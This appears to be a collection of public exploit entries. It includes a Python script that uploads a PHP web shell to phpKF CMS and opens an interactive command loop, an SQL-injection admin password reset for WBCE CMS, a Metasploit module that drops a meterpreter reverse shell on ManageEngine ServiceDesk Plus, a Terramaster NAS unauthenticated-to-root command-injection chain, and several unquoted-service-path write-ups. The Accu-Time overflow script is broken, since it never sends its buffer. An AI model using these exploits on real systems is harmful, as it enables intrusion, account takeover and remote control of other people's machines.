<pre><code># Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 18/12/2021<br /># Exploit Author: Halit AKAYDIN (hLtAkydn)<br /># Vendor Homepage: https://www.phpkf.com/<br /># Software Link: https://www.phpkf.com/indirme.php<br /># Version: 3.00<br /># Category: Webapps<br /># Tested on: Linux/Windows<br /><br /># phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.<br /># Contains an endpoint that allows remote access<br /># Necessary checks are not made in the file upload mechanism, only the file extension is checked<br /># The file with the extension ".png" can be uploaded and the extension can be changed.<br /><br /><br /># Example: python3 exploit.py -u http://example.com<br /># python3 exploit.py -u http://example.com -l admin -p Admin123<br /><br /><br />from bs4 import BeautifulSoup<br />from time import sleep<br />import requests<br />import argparse<br />import json<br /><br />def main():<br /> parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')<br /> parser.add_argument('-u', '--host', type=str, required=True)<br /> parser.add_argument('-l', '--login', type=str, required=False)<br /> parser.add_argument('-p', '--password', type=str, required=False)<br /> args = parser.parse_args()<br /> print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",<br /> "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")<br /> host(args)<br /><br /><br />def host(args):<br /> #Check http or https<br /> if args.host.startswith(('http://', 'https://')):<br /> print("[?] Check Url...\n")<br /> sleep(2)<br /> args.host = args.host<br /> if args.host.endswith('/'):<br /> args.host = args.host[:-1]<br /> else:<br /> pass<br /> else:<br /> print("\n[?] Check Adress...\n")<br /> sleep(2)<br /> args.host = "http://" + args.host<br /> args.host = args.host<br /> if args.host.endswith('/'):<br /> args.host = args.host[:-1]<br /> else:<br /> pass<br /><br /><br /> # Check Host Status<br /> try:<br /> response = requests.get(args.host)<br /> if response.status_code == 200:<br /> if args.login == None and args.password == None:<br /> create_user(args)<br /> else:<br /> login_user(args)<br /> else:<br /> print("[-] Address not reachable!")<br /> sleep(2)<br /><br /> except requests.ConnectionError as exception:<br /> print("[-] Address not reachable!")<br /> sleep(2)<br /> exit(1)<br /><br /><br />def create_user(args):<br /> print("[*] Create User!\n")<br /> sleep(2)<br /> url = args.host + "/phpkf-bilesenler/kayit_yap.php"<br /> headers = {<br /> "Origin": args.host,<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",<br /> "Referer": "http://fuzzing.com/uye-kayit.php",<br /> "Accept-Encoding": "gzip, deflate"<br /> }<br /> data = {<br /> "kayit_yapildi_mi": "form_dolu",<br /> "oturum": '', "kullanici_adi": "evil",<br /> "sifre": "Evil123",<br /> "sifre2": "Evil123",<br /> "posta": "evil@localhost.com",<br /> "kosul": "on"<br /> }<br /> response = requests.post(url, headers=headers, data=data, allow_redirects=True)<br /> args.login = ("evil")<br /> args.password = ("Evil123")<br /> print("[+] " + args.login + ":" + args.password + "\n")<br /> sleep(2)<br /> login_user(args)<br /><br /><br /><br />def login_user(args):<br /> url = args.host + "/uye-giris.php"<br /> headers = {<br /> "Origin": args.host,<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "Referer": args.host + "/uye-giris.php",<br /> "Accept-Encoding": "gzip, deflate"<br /> }<br /> data = {<br /> "kayit_yapildi_mi": "form_dolu",<br /> "git": args.host + "/index.php",<br /> "kullanici_adi": args.login,<br /> "sifre": args.password,<br /> "hatirla": "on"<br /> }<br /> response = requests.post(url, headers=headers, data=data, allow_redirects=False)<br /> token = response.cookies.get("kullanici_kimlik")<br /> if (token != None):<br /> print("[!] Login Success!\n")<br /> sleep(2)<br /> upload_evil(args, token)<br /> else:<br /> if args.login == "evil" and args.password == "Evil123":<br /> print("[!] Unauthorized user!\n")<br /> print("[!] manually add a user and try again\n")<br /> print("[!] Go to link " + args.host + "/uye-kayit.php\n")<br /> print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")<br /> sleep(2)<br /> else:<br /> print("[!] Unauthorized user!\n")<br /> sleep(2)<br /><br /><br />def upload_evil(args, token):<br /> url = args.host + "/phpkf-bilesenler/yukleme/index.php"<br /> cookies = {<br /> "kullanici_kimlik": token,<br /> "dil": "en"<br /> }<br /> headers = {<br /> "VERICEK": "",<br /> "DOSYA-ADI": "evil.png",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",<br /> "Content-type": "application/x-www-form-urlencoded; charset=utf-8",<br /> "Accept": "*/*",<br /> "Origin": args.host,<br /> "Referer": args.host + "/oi_yaz.php",<br /> "Accept-Encoding": "gzip, deflate"<br /> }<br /> data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"<br /> response = requests.post(url, headers=headers, cookies=cookies, data=data)<br /><br /> if (response.text == "yuklendi"):<br /> print("[!] Upload Success!\n")<br /> sleep(2)<br /> change_name(args, token)<br /> else:<br /> print("[!] Upload Failed!\n")<br /> sleep(2)<br /><br /><br />def change_name(args, token):<br /> url = args.host + "/phpkf-bilesenler/yukleme/index.php"<br /> cookies = {<br /> "kullanici_kimlik": token,<br /> "dil": "en"<br /> }<br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",<br /> "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "Accept": "*/*",<br /> "Origin": args.host,<br /> "Referer": args.host + "/oi_yaz.php",<br /> "Accept-Encoding": "gzip, deflate"<br /> }<br /> data = {<br /> "yenidenadlandir": "evil.png|evil.php",<br /> "vericek": "/"<br /> }<br /> response = requests.post(url, headers=headers, cookies=cookies, data=data)<br /> if (response.text == "Name successfully changed..."):<br /> print("[!] Change Name evil.php!\n")<br /> sleep(2)<br /> find_dict(args, token)<br /> else:<br /> print("[!] Change Failed!\n")<br /> sleep(2)<br /><br />def find_dict(args, token):<br /> url = args.host + "/phpkf-bilesenler/yukleme/index.php"<br /> cookies = {<br /> "kullanici_kimlik": token,<br /> "dil": "en"<br /> }<br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",<br /> "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "Accept": "*/*",<br /> "Origin": args.host,<br /> "Referer": args.host + "/oi_yaz.php",<br /> "Accept-Encoding": "gzip, deflate"<br /> }<br /> data = {<br /> "vericek": "/",<br /> "dds": "0"<br /> }<br /> response = requests.post(url, headers=headers, cookies=cookies, data=data)<br /> if (response.text == "You can not upload files!"):<br /> print("[!] File not found!\n")<br /> sleep(2)<br /> else:<br /> print("[!] Find Vuln File!\n")<br /> sleep(2)<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> path = soup.find("div").contents[1].replace(" ", "")<br /> exploit(args, path)<br /><br /><br />def exploit(args, path):<br /> print("[+] Exploit Done!\n")<br /> sleep(2)<br /><br /> while True:<br /> cmd = input("$ ")<br /> url = args.host + path + "evil.php?cmd=" + cmd<br /> headers = {<br /> "Upgrade-Insecure-Requests": "1",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"<br /> }<br /><br /> response = requests.post(url, headers=headers, timeout=5)<br /><br /> if response.text == "":<br /> print(cmd + ": command not found\n")<br /> else:<br /> print(response.text)<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
<pre><code>#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : Connectify Inc<br />#Version : Connectify Hotspot 2018<br />#Vendor Homepage : https://www.connectify.me/<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc Connectify<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: Connectify<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files<br />(x86)\Connectify\ConnectifyService.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Connectify Hotspot 2018<br /> DEPENDENCIAS : wlansvc<br /> : winmgmt<br /> : http<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset<br /># Google Dork: intext: "Way Better Content Editing"<br /># Date: 20/12/2021<br /># Exploit Author: citril or https://github.com/maxway2021<br /># Vendor Homepage: https://wbce.org/<br /># Software Link: https://wbce.org/de/downloads/<br /># Version: <= 1.5.1<br /># Tested on: Linux<br /># CVE : CVE-2021-3817<br /># Github repo: https://github.com/WBCE/WBCE_CMS<br /># Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75<br /><br />import requests<br /><br />_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment<br />_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature<br /><br />headers = {<br /> 'User-Agent': 'Mozilla/5.0',<br /> 'Accept':<br />'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Connection': 'close'<br />}<br /><br />_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"<br /><br />r = requests.post(url = _url, headers = headers, data = _p)<br />if r.status_code == 200:<br /> print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-17<br /># Vendor Homepage: https://www.wondershare.com/<br /># Software Link : https://download.wondershare.com/drfone_full3360.exe<br /># Tested Version: 11.4.9<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """<br /><br />Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc DFWSIDService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: DFWSIDService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare WSID help<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-12-22<br /># Vendor Homepage: https://www.accu-time.com/<br /># Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/<br /># Tested Version: 1.0<br /># Vulnerability Type: Buffer Overflow (DoS) Remote<br /># Tested on OS: linux <br /><br /># Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow<br /><br /># Steps to reproduce:<br /># 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23<br /># 2. - Run the Script from remote PC/IP<br /># 3. - Telnet Crashed<br /><br />#!/usr/bin/env python3<br /><br />import socket<br />import sys<br />print("#######################################################")<br />print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")<br />print("# -------------------------- #")<br />print("# BY Yehia Elghaly #")<br />print("#######################################################")<br /><br />if (len(sys.argv)<2):<br /> print ("Usage: %s <Target Host> ") % sys.argv[0]<br /> print ("Example: %s 192.168.113.1 ") % sys.argv[0]<br /> exit(0)<br /><br />print ("\nSending Evil.......Buffer...")<br />s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br /><br />try:<br /> s.connect((sys.argv[1], 23))<br /> buffer = "A"*9400<br /> s.send(" Crashed Check the connection")<br /> Print ("Crashed")<br />except:<br /> print ("Could not connect to ACCU Time Telnet!")<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-17<br /># Vendor Homepage: https://www.wondershare.com/<br /># Software Link : https://download.wondershare.com/mobiletrans_full5793.exe<br /># Tested Version: 3.5.9<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """<br /><br />Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc ElevationService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ElevationService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Driver Install Service help<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',<br /> 'Description' => %q{<br /> This module exploits CVE-2021-44077, an unauthenticated remote code<br /> execution vulnerability in ManageEngine ServiceDesk Plus, to upload an<br /> EXE (msiexec.exe) and execute it as the SYSTEM account.<br /><br /> Note that build 11305 is vulnerable to the authentication bypass but<br /> not the file upload. The module will check for an exploitable build.<br /> },<br /> 'Author' => [<br /> # Discovered by unknown threat actors<br /> 'wvu', # Analysis and exploit<br /> 'Y4er' # Additional confirmation<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-44077'],<br /> ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],<br /> ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],<br /> ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],<br /> ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],<br /> ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],<br /> ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup<br /> ],<br /> 'DisclosureDate' => '2021-09-16',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> ['Windows Dropper', {}]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8080,<br /> 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target failed to respond to check.')<br /> end<br /><br /> # NOTE: /RestAPI/ImportTechnicians was removed after build 11303<br /> unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')<br /> return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')<br /> end<br /><br /> CheckCode::Appears('/RestAPI/ImportTechnicians is present.')<br /> end<br /><br /> def exploit<br /> upload_msiexec<br /> execute_msiexec<br /> end<br /><br /> def upload_msiexec<br /> print_status('Uploading msiexec.exe')<br /><br /> form = Rex::MIME::Message.new<br /> form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')<br /> form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',<br /> 'form-data; name="theFile"; filename="msiexec.exe"')<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),<br /> 'ctype' => "multipart/form-data; boundary=#{form.bound}",<br /> 'data' => form.to_s<br /> )<br /><br /> unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')<br /> fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')<br /> end<br /><br /> print_good('Successfully uploaded msiexec.exe')<br /> end<br /><br /> def execute_msiexec<br /> print_status('Executing msiexec.exe')<br /><br /> # This endpoint "won't" return<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),<br /> 'vars_post' => {<br /> 'execute' => 's247AgentInstallationProcess'<br /> }<br /> }, 0)<br /> end<br /><br /> # XXX: FileDropper dies a miserable death if the file is in use<br /> def on_new_session(_session)<br /> super<br /><br /> # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7<br /> print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")<br /> end<br /><br />end<br /></code></pre>
<pre><code># Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-17<br /># Vendor Homepage: https://www.wondershare.com/<br /># Software Link : https://download-es.wondershare.com/famisafe_full7869.exe<br /># Tested Version: 1.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """<br /><br />FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc FSService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: FSService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : FSService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>#/bin/env python<br /><br />"""<br />Product: Terramaster F4-210, Terramaster F2-210<br />Version: TOS 4.2.X (4.2.15-2107141517)<br />Author: n0tme (thatsn0tmysite)<br />Description: Chain from unauthenticated to root via session crafting.<br />"""<br /><br />import urllib3<br />import requests<br />import json<br />import argparse<br />import hashlib<br />import time<br />import os<br /><br />TARGET = None <br />MAC_ADDRESS = None<br />PWD = None<br />TIMESTAMP = None <br /><br />def tos_encrypt_str(toencrypt):<br /> key = MAC_ADDRESS[6:] <br /> return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()<br /><br />def user_session(session, username):<br /> session.cookies.clear()<br /> cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)}<br /> if username == "guest":<br /> cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")}<br /> <br /> for name,value in cookies.items():<br /> session.cookies[name] = value<br /><br />def download(session, path, save_as=None):<br /> user_session(session, "guest")<br /> r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path})<br /> filename = os.path.basename(path)<br /> if save_as is not None:<br /> filename = save_as<br /> with open(filename, "wb") as file:<br /> file.write(r.content)<br /><br />def get_admin_users(session):<br /> download(session, "/etc/group", save_as="/tmp/terramaster_group")<br /> with open("/tmp/terramaster_group", "r") as groups:<br /> for line in groups:<br /> line = line.strip()<br /> fields = line.split(':')<br /> if fields[0] == "admin":<br /> users = fields[3].split(",")<br /> os.remove("/tmp/terramaster_group")<br /> return users <br /><br />if __name__ == '__main__':<br /> p = argparse.ArgumentParser()<br /> p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")<br /> p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")<br /> p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)<br /> p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)<br /> p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)<br /> p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")<br /> p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")<br /> args = p.parse_args()<br /> urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /> TARGET = args.target <br /><br /> s = requests.Session()<br /> if args.tor:<br /> s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}<br /> s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"})<br /> <br /> r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")<br /> try:<br /> j = r.json()<br /> PWD = j["data"]["PWD"]<br /> MAC_ADDRESS = j["data"]["ADDR"]<br /> except KeyError:<br /> exit(1)<br /> <br /> TIMESTAMP = str(int(time.time()))<br /> s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})<br /> s.headers.update({"authorization": PWD})<br /><br /> if args.download != None:<br /> download(s, args.download, save_as=args.save_as)<br /> exit(0)<br /><br /> #RCEs<br /> RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",<br /> f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND<br /> f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND<br /> <br /> for admin in get_admin_users(s):<br /> user_session(s, admin)<br /> if args.create != None:<br /> user, password = args.create.split(":") <br /> groups = json.dumps(["allusers", "admin"])<br /> r=s.post(f"{TARGET}/module/api.php?mobile/__construct")<br /> r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""})<br /> if "create user successful!" in str(r.content, "utf8"):<br /> print(r.content)<br /> break<br /> continue<br /><br /> r = s.get(RCEs[args.rce])<br /> content = str(r.content, "utf-8")<br /> if "<!--user login-->" not in content: <br /> print(content)<br /> exit(0)<br /></code></pre>
<pre><code># Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-17<br /># Vendor Homepage: https://www.wondershare.com/<br /># Software Link : https://download.wondershare.com/ubackit_full8767.exe<br /># Tested Version: 2.0.5<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """<br /><br />Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc wsbackup<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: wsbackup<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare wsbackup Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>